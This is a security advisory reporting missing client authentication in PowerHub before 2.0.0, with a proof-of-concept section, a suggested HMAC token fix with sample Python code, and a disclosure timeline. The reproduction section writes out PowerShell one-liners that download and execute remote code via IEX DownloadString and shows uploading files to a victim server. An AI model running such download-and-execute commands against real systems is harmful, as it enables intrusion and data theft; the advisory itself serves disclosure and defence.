Security vulnerability
General information | |
---|---|
Vulnerability type | Missing authentication / Information Disclosure |
Affected product | https://github.com/AdrianVollmer/PowerHub |
Reporter | security-research@six-two.dev |
Affected version(s) | < 2.0.0 |
Fixed version | 2.0.0 |
Short summary
The PowerHub software does not verify clients. This allows malicious actors to connect to a PowerHub instance as a client, read clipboard entries, obtain the name of the user running PowerHub, upload files and download modules (which may contain proprietary code). Attackers can also use publicly accessible PowerHub instances in their own attacks, which may be used to frame the operator of the server PowerHub is running on.
Recommendation
Client authentication
I would recommend adding a secret token variable to the launcher code:
$T='RandomSecretToken'; $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
The token variable's contents can then be used to authenticate any requests performed by the client.
The token may be passed as an HTTP header. Alternatively, an HMAC over the request body could be computed and used to verify that the client knows the secret:
VerificationToken = HMAC(Token, HttpBody)
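As an added illustration of this recommendation (not PowerHub's own code, and written against the advisory's formula rather than the 2.0.0 fix), the following stand-alone Python shows a server-side check that accepts a request only when a hypothetical `X-PowerHub-Token` header carries `HMAC(Token, HttpBody)`; the secret value, header name and request body are constructed for the example.

```python
import hashlib
import hmac

# Constructed secret that the operator would embed in the launcher as $T.
TOKEN = "RandomSecretToken"
# Assumed header name; PowerHub does not define this.
HEADER_NAME = "X-PowerHub-Token"


def verification_token(token: str, http_body: bytes) -> str:
    """VerificationToken = HMAC(Token, HttpBody), as hex SHA-256 HMAC."""
    return hmac.new(token.encode(), http_body, hashlib.sha256).hexdigest()


def client_request(token: str, http_body: bytes) -> dict:
    """Headers an authenticated client would attach to its request."""
    return {HEADER_NAME: verification_token(token, http_body)}


def verify_request(token: str, headers: dict, http_body: bytes) -> bool:
    """Server-side check: accept only if the sender knew the token.

    compare_digest() is constant-time, so a wrong MAC cannot be refined
    byte by byte through timing differences.
    """
    presented = headers.get(HEADER_NAME)
    if not presented:
        return False
    expected = verification_token(token, http_body)
    return hmac.compare_digest(presented, expected)


def demo() -> tuple:
    """Exercise the four cases a server must get right."""
    body = b"a=reflection&t=http&c=1"  # constructed request body
    good = verify_request(TOKEN, client_request(TOKEN, body), body)
    wrong_secret = verify_request(TOKEN, client_request("guess", body), body)
    tampered = verify_request(TOKEN, client_request(TOKEN, body), body + b"&c=2")
    missing_header = verify_request(TOKEN, {}, body)
    return good, wrong_secret, tampered, missing_header
```

A MAC over the body alone does not bind the request to a URL or a point in time, so a captured request could be replayed against the same endpoint; folding the path and a timestamp or nonce into the MAC input is the usual extension.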
Prevent username leak
It is recommended to remove the username from the List-HubModules command output. Ideally, only relative paths such as ./custom.ps1 would be shown.
Reproduction / Proof of Concept(s)
Due to time constraints, I have not actually developed an easy way to read the modules, clipboard entries, etc. However, since the PowerShell executes the code it should be possible to obtain this data by attaching a debugger or writing a custom client based on the source code of PowerHub.
Testing environment
As the target I used PowerHub installed on my host (Linux) via pip:
$ pip install powerhub
$ pip show powerhub
Name: PowerHub
Version: 1.11
[...]
As the attacker's machine I used a Windows VM. The VM was connected to the host via the Bridged Adapter option of VirtualBox.
Setup
Victim
- Start PowerHub:
powerhub 192.168.0.116 --auth user:password
- Log in to the web interface and add two clipboard entries.
- Create a custom module (~/.local/share/powerhub/modules/custom.ps1)
Attacker
- Run a local PowerHub instance, log in to the web interface and grab the commands to execute on the client. Replace the local address and port with those of the victim.
- Execute these commands in a Windows PowerShell.
(1) Reading clipboard entries
Clipboard entries might be used to store sensitive information (such as command output containing hashes or passwords) to make it easily available on multiple machines, or they may contain proprietary code that is not intended to be leaked.
Clipboard entries are referenced by a counter, which makes them trivial to enumerate.
Clipboard entry 1:
$K=New-Object Net.WebClient;'a=reflection','t=http&c=1'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
Clipboard entry 2:
$K=New-Object Net.WebClient;'a=reflection','t=http&c=2'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
(2) Uploading files
Using the PushTo-Hub command, clients can upload files to the PowerHub server. Attackers may use this to fill the server's disk space (which may affect system availability) or to upload illegal content to frame the victim.
PS C:\Users\Admin> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
True
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
1.11 written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\Admin> PushTo-Hub C:\Users\Admin\Desktop\hacked.txt
Similarly, the Mount-Webdav functionality can be used to upload files. Since attackers get read/write access to certain folders, it may also be used to distribute illegal content.
PS C:\Users\Admin> Mount-Webdav
PS C:\Users\Admin>
Files stored on the server (victim):
$ tree ~/.local/share/powerhub -h
[...]
├── [4.0K] upload
│ └── [ 20] hacked.txt
├── [4.0K] webdav
│ ├── [4.0K] blackhole
│ ├── [5.9K] New Text Document.txt
│ └── [4.0K] public
│ └── [ 4] New Text Document.txt
[...]
(3) Listing and downloading modules
Clients can obtain a list of modules (PowerShell scripts and executables). Attackers may use this to download modules from the server. If these modules contain confidential data (such as proprietary exploits or credentials for backdoors), that data can be accessed by anyone who can reach the server.
PS C:\Users\Admin> lshm
N Type Name Loaded
- ---- ---- ------
0 ps1 /home/REDACTED/.local/share/powerhub/modules/custom.ps1 False
PS C:\Users\Admin> lhm 1
PS C:\Users\Admin>
This call additionally reveals the user's name, which may be used in attacks such as SSH password guessing.
Solution
The problems were fixed in version 2.0.0. The response from the developer explains it best:
Hi,
version 2.0.0 has now been released. It should now be impossible to find an endpoint that discloses clipboard entries without knowing the key. Finding the key without knowing it already should also be impossible. And even then, only clipboard entries that have been marked as "executable" will be disclosed. Thanks again for reporting.
Timeline
Action | Date |
---|---|
Vulnerabilities discovered | 2022-08-13 |
Vulnerabilities reported | 2022-08-15 |
Vulnerabilities resolved | 2023-02-26 |
Published this advisory | 2023-08-01 |
Note: The vulnerabilities were fixed as part of a big rewrite (PowerHub version 2), which is why the fix took a while to roll out.